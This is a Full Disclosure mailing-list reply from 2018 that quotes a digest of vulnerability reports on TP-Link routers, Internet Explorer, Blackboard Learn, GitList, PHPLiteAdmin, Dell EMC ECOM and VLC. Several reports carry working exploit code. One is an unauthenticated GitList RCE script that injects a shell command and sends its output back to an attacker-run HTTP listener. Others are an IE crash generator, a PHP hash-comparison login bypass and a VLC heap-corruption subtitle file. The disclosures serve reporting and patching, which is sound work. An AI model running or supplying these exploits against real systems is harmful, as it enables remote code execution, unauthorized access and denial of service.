| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 27 Apr 2018 19:54:49 +0000
From: Derrek Bertrand <derrekbertrand@...il.com>
To: fulldisclosure@...lists.org
Subject: Re: [FD] Unvalidated Redirect in Shibboleth component of Blackboard
Blackboard's code base is related to some other education suites (Canvas?).
I can't remember which ones, but this is one of those components that
rarely get touched after they're written. You might try checking some of
the other commercial and open source products for this issue if you have
access to them.
I have someone I can ask for more details on the product history if needed.
Hope this is helpful.
On Apr 27, 2018 12:00 PM, <fulldisclosure-request@...lists.org> wrote:
Send Fulldisclosure mailing list submissions to
fulldisclosure@...lists.org
To subscribe or unsubscribe via the World Wide Web, visit
https://nmap.org/mailman/listinfo/fulldisclosure
or, via email, send a message with subject or body 'help' to
fulldisclosure-request@...lists.org
You can reach the person managing the list at
fulldisclosure-owner@...lists.org
When replying, please edit your Subject line so it is more specific
than "Re: Contents of Fulldisclosure digest..."
Today's Topics:
1. [RCE] TP-Link Remote Code Execution CVE-2017-13772 v2 - >180,
000 affected devices (Andrew Mabbitt)
2. [** FIX CODE TYPO] Microsoft (Win 10) InternetExplorer
v11.371.16299.0 - Denial Of Service (hyp3rlinx)
3. Unvalidated Redirect in Shibboleth component of Blackboard
Learn (Ethan Sweet)
4. GitList 0.6 Unauthenticated RCE (Kacper Szurek)
5. Re: Authorization bypass in PHPLiteAdmin since 1.9.5
(Karsten K?nig)
6. DSA-2018-013: Dell EMC ECOM XML External Entity Injection
Vulnerability (EMC Product Security Response Center)
7. VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5
Memory Corruption (PoC) (Kroppoloe)
---------- Forwarded message ----------
From: Andrew Mabbitt <andrew@...usinfosec.com>
To: fulldisclosure@...lists.org
Cc:
Bcc:
Date: Thu, 26 Apr 2018 15:32:43 +0100
Subject: [FD] [RCE] TP-Link Remote Code Execution CVE-2017-13772 v2 - >180,
000 affected devices
Title: [CVE-2017-13772] TPLink TLWR740N Remote Code Execution
Blog URL:
https://www.fidusinfosec.com/a-curious-case-of-code-reuse-tplink-cve-2017-13772-v2/
Vendor: TP-Link
Date Published: 26/04/2018
CVE: CVE-2017-13772
** Vulnerability Summary
A remote code execution vulnerability was identified in TP-Link's
WR740N home WiFi router. Valid credentials are required for this
attack path. It is possible for an authenticated attacker to obtain a
remote shell with root privileges. This vulnerability of a clone of
CVE-2017-13772 reported by the Fidus team last year. There are
currently >180,000
affected devices searchable on Shodan.
** Vendor Response The vendor response has been lacking and a patch has
still not been released after 3 months. ** Report Timeline 25/1/18 –
Initial contact with description of issue, contact with security@...link.com
26/1/18 – Reply from TP-Link asking for more details, sent them the details
for CVE-2017-13772 (wr940n model).
1/2/18 – TP_Link inform us they are looking into the issue.
15/2/18 – Request from us for an update.
30/2/18 – Request from us for an update.
26/3/18 – Another request for an update, warning of public disclosure sent.
28/3/18 – Reply from security@...link.com, inform us they are releasing a
patch in the “recent days”.
29/3/18 – security@...link.com send us beta firmware to fix the issue.
29/3/18 – Sent a reply to security@...link.com to confirm the issue fixed.
9/4/18 – Request for an estimate for when the firmware goes live.
18/4/18 – Another request, another warning of public disclosure sent.
26/4/18 – No reply received, public disclosure of vulnerability. ** Credit
This vulnerability was discovered by Tim Carrington @__invictus_, part of
the Fidus Information Security research team. ** References
https://www.fidusinfosec.com/a-curious-case-of-code-reuse-tplink-cve-2017-13772-v2/
<https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/> **
Disclaimer This advisory is licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 License:
http://creativecommons.org/licenses/by-nc-sa/3.0/
---------- Forwarded message ----------
From: hyp3rlinx <apparitionsec@...il.com>
To: fulldisclosure@...lists.org
Cc:
Bcc:
Date: Wed, 25 Apr 2018 11:16:49 -0400
Subject: [FD] [** FIX CODE TYPO] Microsoft (Win 10) InternetExplorer
v11.371.16299.0 - Denial Of Service
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-(Win-10)-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
Vendor:
=======www.microsoft.com
Product:
========
Internet Explorer (Windows 10)
v11.371.16299.0
Internet Explorer is a series of graphical web browsers developed by
Microsoft and included in the Microsoft Windows line of operating
systems, starting in 1995.
Vulnerability Type:
==================
Denial Of Service
CVE Reference:
==============
N/A
Security Issue:
================
A null pointer de-reference (read) results in an InternetExplorer
Denial of Service (crash) when MSIE encounters an specially crafted
HTML HREF tag containing an empty reference for certain Windows file
types. Upon IE crash it will at times daringly attempt to restart
itself,
if that occurs and user is prompted by IE to restore their browser
session, then selecting this option so far in my tests has shown to
repeat the
crash all over again. This can be leveraged by visiting a hostile
webpage or link to crash an end users MSIE browser.
Referencing some of the following extensions .exe:, .com:, .pif:,
.bat: and .scr: should produce the same :)
Tested Windows 10
Stack Dump:
==========
(2e8c.27e4): Access violation - code c0000005 (first/second chance not
available)
ntdll!NtWaitForMultipleObjects+0x14:
00007ffa`be5f0e14 c3 ret
0:015> r
rax=000000000000005b rbx=0000000000000003 rcx=0000000000000003
rdx=000000cca6efd3a8 rsi=0000000000000000 rdi=0000000000000003
rip=00007ffabe5f0e14 rsp=000000cca6efcfa8 rbp=0000000000000000
r8=0000000000000000 r9=0000000000000000 r10=0000000000000000
r11=0000000000000246 r12=0000000000000010 r13=000000cca6efd3a8
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00000246
ntdll!NtWaitForMultipleObjects+0x14:
00007ffa`be5f0e14 c3 ret
CONTEXT: (.ecxr)
rax=0000000000000000 rbx=000001fd4a2ec9d8 rcx=0000000000000000
rdx=00007ffabb499398 rsi=000001fd4a5b0ce0 rdi=0000000000000000
rip=00007ffabb7fc646 rsp=000000cca6efe4f8 rbp=000000cca6efe600
r8=0000000000000000 r9=0000000000008000 r10=00007ffabb499398
r11=0000000000000000 r12=0000000000000000 r13=00007ffabb48d060
r14=0000000000000002 r15=0000000000000001
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010246
KERNELBASE!StrCmpICW+0x6:
00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11]
ds:00000000`00000000=????
Resetting default scope
FAULTING_IP:
KERNELBASE!StrCmpICW+6
00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffabb7fc646 (KERNELBASE!StrCmpICW+0x0000000000000006)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 0000000000000000
Attempt to read from address 0000000000000000
DEFAULT_BUCKET_ID: NULL_POINTER_READ
PROCESS_NAME: iexplore.exe
POC video URL:
==============https://vimeo.com/265691256/
Exploit/POC:
============
1) Run below python script to create "IE-Win10-Crasha.html"
2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10
payload=('<br>\n'+
'<center>MSIE v11.371.16299 Denial Of Service by hyp3rlinx <br>\n'+
'<a href=".cmd:" id="hate">crashy ware shee</a>\n'+
'<br>\n'+
'Tested successfully on Windows 10\n'+
'</center><script>\n'
'function doit(){\n'+
'document.getElementById("hate").click();\n'+
'alert("DOH!");\n'+
'}\n'+
'setInterval("doit()", 2000)\n'+
'</script>')
file=open("IE-Win10-Crasha.html","w")
file.write(payload)
file.close()
print 'MS InternetExplorer (Win 10) '
print 'Denial Of Service File Created.'
print 'hyp3rlinx'
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: April 18, 2018
vendor closes thread : April 19, 2018
April 20, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
---------- Forwarded message ----------
From: Ethan Sweet <ethan@...an.pm>
To: fulldisclosure <fulldisclosure@...lists.org>
Cc:
Bcc:
Date: Thu, 26 Apr 2018 14:13:45 -0700
Subject: [FD] Unvalidated Redirect in Shibboleth component of Blackboard
Learn
CVE-2017-18262
[Description]
Since at least the 17th of October 2017 (Initial report date) Blackboard
Learn has allowed Unvalidated Redirects on any signed in user through its
endpoints for handling Shibboleth logins.
The vulnerable endpoint is:
BLACKBOARD/webapps/bb-auth-provider-shibboleth-BBLEARN/execute/shibbolethLogin?returnUrl=myEvilUrl&authProviderId=realAuthProvider
Where:
BLACKBOARD is the Blackboard Learn web server endpoint.
myEvilUrl is any URL you want, URL encoded of course.
realAuthProvider is the auth provider, normally you can just gather this by
attempting a real shibboleth login and looking at what authProviderId is
set to.
This attack only works against Blackboard Learn web servers with Shibboleth
set up.
[Reproduction steps]
Set up a blackboard learn web server, make sure shibboleth is set up.
Copy the shibboleth login URL from the sign in page (should look like the
endpoint above)
Replace the returnUrl with another URL (myEvilUrl).
Open the URL and log in as normal (if not already signed in properly to
complete shibboleth login).
You will be redirected to the returnUrl you gave, regardless of what that
url is.
[Type]
Unvalidated Redirect
[Vendor]
Blackboard Inc
[Discoverer]
Ethan Sweet
---------- Forwarded message ----------
From: Kacper Szurek <kacperszurek@...il.com>
To: fulldisclosure@...lists.org
Cc:
Bcc:
Date: Thu, 26 Apr 2018 14:14:12 +0200
Subject: [FD] GitList 0.6 Unauthenticated RCE
# Exploit Title: GitList 0.6 Unauthenticated RCE
# Date: 25-04-2018
# Software Link: https://github.com/klaussilveira/gitlist
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
1. Description
Bypass/Exploit `escapeshellarg` using argument injection: `git grep
--open-files-in-pager=whoami`.
More info about this technique:
https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html
2. Proof of Concept
```python
import requests
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import urlparse
import urllib
import threading
import time
import os
import re
url = 'http://192.168.1.1/gitlist/'
command = 'id'
your_ip = '192.168.1.100'
your_port = 8001
print "GitList 0.6 Unauthenticated RCE"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "REMEMBER TO DISABLE FIREWALL"
search_url = None
r = requests.get(url)
repos = re.findall(r'/([^/]+)/master/rss', r.text)
if len(repos) == 0:
print "[-] No repos"
os._exit(0)
for repo in repos:
print "[+] Found repo {}".format(repo)
r = requests.get("{}{}".format(url, repo))
files = re.findall(r'href="[^\"]+blob/master/([^\"]+)"', r.text)
for file in files:
r = requests.get("{}{}/raw/master/{}".format(url, repo, file))
print "[+] Found file {}".format(file)
print r.text[0:100]
search_url = "{}{}/tree/{}/search".format(url, repo, r.text[0:1])
break
if not search_url:
print "[-] No files in repo"
os._exit(0)
print "[+] Search using {}".format(search_url)
class GetHandler(BaseHTTPRequestHandler):
def do_GET(self):
parsed_path = urlparse.urlparse(self.path)
print "[+] Command response"
print urllib.unquote_plus(parsed_path.query).decode('utf8')[2:]
self.send_response(200)
self.end_headers()
self.wfile.write("OK")
os._exit(0)
def log_message(self, format, *args):
return
def exploit_server():
server = HTTPServer((your_ip, your_port), GetHandler)
server.serve_forever()
print "[+] Start server on {}:{}".format(your_ip, your_port)
t = threading.Thread(target=exploit_server)
t.daemon = True
t.start()
print "[+] Server started"
r = requests.post(search_url,
data={'query':'--open-files-in-pager=php -r
"file_get_contents(\\"http://
{}:{}/?a=\\".urlencode(shell_exec(\\"{}\\")));"'.format(your_ip,
your_port, command)})
while True:
time.sleep(1)
```
3. Solution:
Update to version 0.7.0
https://github.com/klaussilveira/gitlist/releases/tag/0.7.0
---------- Forwarded message ----------
From: "Karsten König" <mail@...enig.net>
To: fulldisclosure@...lists.org
Cc:
Bcc:
Date: Wed, 25 Apr 2018 10:58:09 +0200
Subject: Re: [FD] Authorization bypass in PHPLiteAdmin since 1.9.5
Hello,
wbowling from GitHub found out that this bug is even more serious and
can be used to bypass the authorization for arbitary passwords. The bug
is in Line 40 of classes/Authorization.php[0]. The salt is generated
with every reload. You can create cookies again and again until you have
a salt which gives you a hash like '0e179250003459658275905707244744'.
Now you can login with that specific salt and '0' as the cookie.
Best,
Karsten
[0]
https://github.com/phpLiteAdmin/pla/blob/f3998704a846ddf71539092cd6fe84f2e9c35725/classes/Authorization.php#L40
On 23.04.2018 06:41, Karsten König wrote:
> Hello,
>
> I found a small issue in PHPLiteAdmin. It's an authorization bypass
> which works since version 1.9.5 from 2014 (current is 1.9.7.1) because
> PLA uses '==' instead of '===' for the password comparison in
> 'attemptGrant' of the 'Authorization' class. If the password is set to
> one which correspondends to a number in scientific notation, one could
> easier bruteforce the password or bypass it completely, e.g.:
>
> php > var_dump('200' == '2e2');
> bool(true)
> php > var_dump('0' == '0e2');
> bool(true)
> php > var_dump('0' == '0e2342');
> bool(true)
>
> I opened an issue at GitHub for this[0] and have written about it[1]
> (section 2 is the interesting one for this issue).
>
> Best,
>
> Karsten
>
> [0] https://github.com/phpLiteAdmin/pla/issues/11
> [1]
>
http://k3research.outerhaven.de/posts/small-mistakes-lead-to-big-problems.html
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
---------- Forwarded message ----------
From: EMC Product Security Response Center <Security_Alert@....com>
To: "'fulldisclosure@...lists.org'" <fulldisclosure@...lists.org>
Cc:
Bcc:
Date: Wed, 25 Apr 2018 19:01:35 +0000
Subject: [FD] DSA-2018-013: Dell EMC ECOM XML External Entity Injection
Vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
DSA-2018-013: Dell EMC ECOM XML External Entity Injection Vulnerability
EMC Identifier: DSA-2018-013
CVE Identifier: CVE-2018-1183
Severity: High
Severity Rating: CVSS Base Score: 7.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L)
Affected products:
Dell EMC Unisphere for VMAX Virtual Appliance versions prior to 8.4.0.8
Dell EMC Solutions Enabler Virtual Appliance versions prior to 8.4.0.8
Dell EMC VASA Provider Virtual Appliance versions prior to 8.4.0.512
Dell EMC SMIS versions prior to 8.4.0.6
Dell EMC VMAX Embedded Management (eManagement) versions prior to and
including 1.4.0.347
Dell EMC VNX2 Operating Environment (OE) for File versions prior to
8.1.9.231
Dell EMC VNX2 Operating Environment (OE) for Block versions prior to
05.33.009.5.231
Dell EMC VNX1 Operating Environment (OE) for File versions prior to 7.1.82.0
Dell EMC VNX1 Operating Environment (OE) for Block versions prior to
05.32.000.5.225
Dell EMC VNXe3200 Operating Environment (OE) all versions
Dell EMC VNXe1600 Operating Environment (OE) versions prior to 3.1.9.9570228
Dell EMC VNXe 3100/3150/3300 Operating Environment (OE) all versions
Dell EMC ViPR SRM versions 3.7, 3.7.1, 3.7.2 (only if using Dell EMC Host
Interface for Windows)
Dell EMC ViPR SRM versions 4.0, 4.0.1, 4.0.2, 4.0.3 (only if using Dell EMC
Host Interface for Windows)
Dell EMC XtremIO versions 4.x
Dell EMC VMAX eNAS version 8.x
Dell EMC Unity Operating Environment (OE) versions prior to 4.3.0.1522077968
Summary:
The Dell EMC Common Object Manager (ECOM) component used in multiple Dell
EMC products is affected by a XML External Entity (XXE) Injection
vulnerability that may potentially be exploited by malicious users to
compromise the affected system.
Details:
ECOM is affected by a XXE injection vulnerability due to the configuration
of the XML parser shipped with the product. XXE Injection attack may occur
when XML input containing a reference to an external entity (defined by the
attacker) is processed by an affected XML parser. XXE Injection may allow
attackers to gain unauthorized access to files containing sensitive
information or may be used to cause denial-of-service. ECOM is used in Dell
EMC products listed under affected products above.
Resolution:
The following Dell EMC product releases address this vulnerability:
Host Installs:
Dell EMC SMI-S 8.4.0.6 hotfix 2052, Service Alert 1886.
Dell EMC ViPR SRM 4.1.1 (only the Dell EMC Host Interface for Windows,
version 1.4.1)
ESX Server Installs:
Dell EMC Unisphere for VMAX Virtual Appliance 8.4.0.15 OVA.
Dell EMC Unisphere for VMAX Virtual Appliance 8.4.0.15 ISO.
Dell EMC Solutions Enabler Virtual Appliance 8.4.0.15 OVA.
Dell EMC Solutions Enabler Virtual Appliance 8.4.0.15 ISO.
Dell EMC VASA Provider Virtual Appliance 8.4.0.512 OVA.
Dell EMC VASA Provider Virtual Appliance 8.4.0.512 ISO.
VMAX eManagement:
eMGMT 1.4.0.350
VNX Series:
Dell EMC VNX2 Operating Environment (OE) for File 8.1.9.231
Dell EMC VNX2 Operating Environment (OE) for Block 05.33.009.5.231
Dell EMC VNX1 Operating Environment (OE) for File 7.1.82.0
Dell EMC VNX1 Operating Environment (OE) for Block 05.32.000.5.225
Dell EMC VNXe1600 Operating Environment (OE) 3.1.9.9570228
Unity:
Dell EMC Unity Operating Environment (OE) 4.3.0.1522077968
Dell EMC recommends all customers upgrade at the earliest opportunity.
Dell EMC is working on fixes for remaining products below. This advisory
will be updated as fixes for these products are made available.
Dell EMC XtremIO versions 4.x
Dell EMC VMAX eNAS versions 8.x
Dell EMC VNXe 3100/3150/3300 Operating Environment (OE) all versions
Dell EMC VNXe3200 Operating Environment (OE) all versions
Link To Remedies:
Host Installs:
Dell EMC ViPR SRM 4.1.1 Host Interface Setup File (for Dell EMC Host
Interface version 1.4.1) can be downloaded from https://support.Dell
EMC.com/downloads/34247_ViPR-SRM.
Customers are recommended to contact customer support and place a Customer
Service Request for this fix.
ESX Server Installs:
Dell EMC Unisphere for VMAX Virtual Appliance can be downloaded from
https://support.Dell EMC.com/downloads/27045_Unisphere-for-VMAX
Dell EMC VASA Provider Virtual Appliance can be downloaded from
https://support.Dell EMC.com/downloads/40557_VASA-Provider
VMAX eManagement:
Customers are recommended to contact customer support and place a Customer
Service Request for this fix.
VNX Series:
Dell EMC VNX2 Operating Environment (OE) for File 8.1.9.231
Dell EMC VNX2 Operating Environment (OE) for Block 05.33.009.5.231
Dell EMC VNX1 Operating Environment (OE) for File 7.1.82.0
Dell EMC VNX1 Operating Environment (OE) for Block 05.32.000.5.225
Dell EMC VNXe1600 Operating Environment (OE) 3.1.9.9570228 can be
downloaded from https://support.emc.com/downloads/38171_VNXe1600
Unity:
Dell EMC Unity Operating Environment (OE) 4.3.0.1522077968 can be
downloaded from
https://support.emc.com/downloads/39949_Dell-EMC-Unity-Family
Customers are recommended to contact customer support and place a Customer
Service Request for all other fixes.
Credits:
Dell EMC would like to thank Jakub Palaczynski for reporting this
vulnerability.
Read and use the information in this Dell EMC Security Advisory to assist
in avoiding any situation that might arise from the problems described
herein. If you have any questions regarding this product alert, contact
Dell EMC Software Technical Support at 1-877-534-2867.
For an explanation of Severity Ratings, refer to Dell EMC Knowledgebase
solution emc218831. Dell EMC recommends all customers take into account
both the base score and any relevant temporal and environmental scores
which may impact the potential severity associated with particular security
vulnerability.
Dell EMC recommends that all users determine the applicability of this
information to their individual situations and take appropriate action. The
information set forth herein is provided "as is" without warranty of any
kind. Dell EMC disclaims all warranties, either express or implied,
including the warranties of merchantability, fitness for a particular
purpose, title and non-infringement. In no event, shall Dell EMC or its
suppliers, be liable for any damages whatsoever including direct, indirect,
incidental, consequential, loss of business profits or special damages,
even if Dell EMC or its suppliers have been advised of the possibility of
such damages. Some states do not allow the exclusion or limitation of
liability for consequential or incidental damages, so the foregoing
limitation may not apply.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
iQEcBAEBCAAGBQJa4M//AAoJEHbcu+fsE81ZnwQH/jLDSZcQPRCsX35D1BL8UBwD
IdmTl5mfSTe4JrOJmQkGNWTDYNEYvk3izhfQHd/HP+GqhT3Q7yDQPYr2FROPcKFF
YsEbyUTL33Gb9PyzaIejt/Zf/7SpLIwDM5W3M5WSsutY/8lmRxUhGrL7NPAYZ8OI
P3gaxHAoLxYED4e0K4nzVfTyyWaRPDHw680fCHXgYNlB92SPfP+X1FX4jKxJDp+7
aonKO7PcY7sxfwapffa3lrG4gwEuj0ce5JqT5kQZxncyJDB7auv4MPHE4W8neazm
5uecIrhYSfY9Scbg/AyoTH2T3lEiTGX2kT8ylxjWqz8GMpkrEJVtqQ+DUZLF/AE=
=bklQ
-----END PGP SIGNATURE-----
---------- Forwarded message ----------
From: Kroppoloe <kroppoloe@...tonmail.ch>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Cc:
Bcc:
Date: Sun, 22 Apr 2018 07:29:07 -0400
Subject: [FD] VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5
Memory Corruption (PoC)
> ‐‐‐‐‐‐‐ Original Message ‐‐‐‐‐‐‐
> On 22 April 2018 4:27 AM, Kroppoloe <kroppoloe@...tonmail.ch> wrote:
>
>> """
>> VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 Memory
Corruption (PoC)
>> Author: SivertPL (kroppoloe@...tonmail.ch)
>> CVE: CVE-2017-8311
>>
>> Infamous VLC/Kodi/PopcornTime subtitle attack in libsubtitle_plugin.dll.
>> This is the Proof of Concept of the reverse engineered heap corruption
vulnerability affecting JacoSUB parsing in VLC/Kodi/PopcornTime.
>> The crash is exploitable, but hard to exploit because of various
environmental constraints such as threading/mitigations/scriptless.
>> I want to join a research team.
>> """
>>
>> """
>> ModLoad: 00000000`71660000 00000000`716a2000 C:\Program Files
(x86)\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
>> ModLoad: 00000000`71630000 00000000`71651000 C:\Program Files
(x86)\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
>> ModLoad: 00000000`71610000 00000000`7162e000 C:\Program Files
(x86)\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
>> ModLoad: 00000000`71600000 00000000`7160d000 C:\Program Files
(x86)\VideoLAN\VLC\plugins\demux\libdemux_cdg_plugin.dll
>> ModLoad: 00000000`715e0000 00000000`715fd000 C:\Program Files
(x86)\VideoLAN\VLC\plugins\demux\libvobsub_plugin.dll
>> ModLoad: 00000000`715d0000 00000000`715de000 C:\Program Files
(x86)\VideoLAN\VLC\plugins\demux\libdemux_stl_plugin.dll
>> ModLoad: 00000000`715b0000 00000000`715cf000 C:\Program Files
(x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll
>> core demux error: option sub-original-fps does not exist
>> (33c.d10): Access violation - code c0000005 (first chance)
>> First chance exceptions are reported before any exception handling.
>> This exception may be expected and handled.
>> *** ERROR: Symbol file could not be found. Defaulted to export symbols
for C:\Program Files
(x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll -
>> libsubtitle_plugin+0x44de:
>> 715b44de 881f mov byte ptr [edi],bl
ds:002b:1b9fb000=??
>> 0:012:x86> g
>> (33c.d10): Access violation - code c0000005 (!!! second chance !!!)
>> wow64!Wow64NotifyDebugger+0x1d:
>> 00000000`754ac9f1 654c8b1c2530000000 mov r11,qword ptr gs:[30h]
gs:00000000`00000030=????????????????
>> """
>>
>> import os
>> import struct
>> import sys
>> import argparse
>>
>> len = 1025
>>
>> def main(argv):
>> parser = argparse.ArgumentParser()
>> parser.add_argument("filename", help="Name of the movie file w/o
extension, for generating payload")
>> parser.add_argument("--length", help="Heap overwrite length (default
1025, may be bigger)", type=int)
>> args = parser.parse_args()
>> if args.length:
>> global len
>> len = args.length
>> print "[+] Generating file %s.jss with overwrite size of %d" %
(args.filename, len)
>> write(args.filename, len)
>>
>> def write(name, len):
>> subtitles = open("%s.jss" % name, "w+")
>> subtitles.write("0:00:02.00 0:00:04.00 VL red chimera..\n")
>> subtitles.write("0:00:04.00 0:00:05.00 vm attack")
>> subtitles.write("\\C")
>> subtitles.write(struct.pack('B', 0))
>> subtitles.write('A' * len)
>> subtitles.close()
>> print "[+] Done!"
>>
>> if __name__ == "__main__":
>> main(sys.argv[1:])
_______________________________________________
Full Disclosure mailing list
Fulldisclosure@...lists.org
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists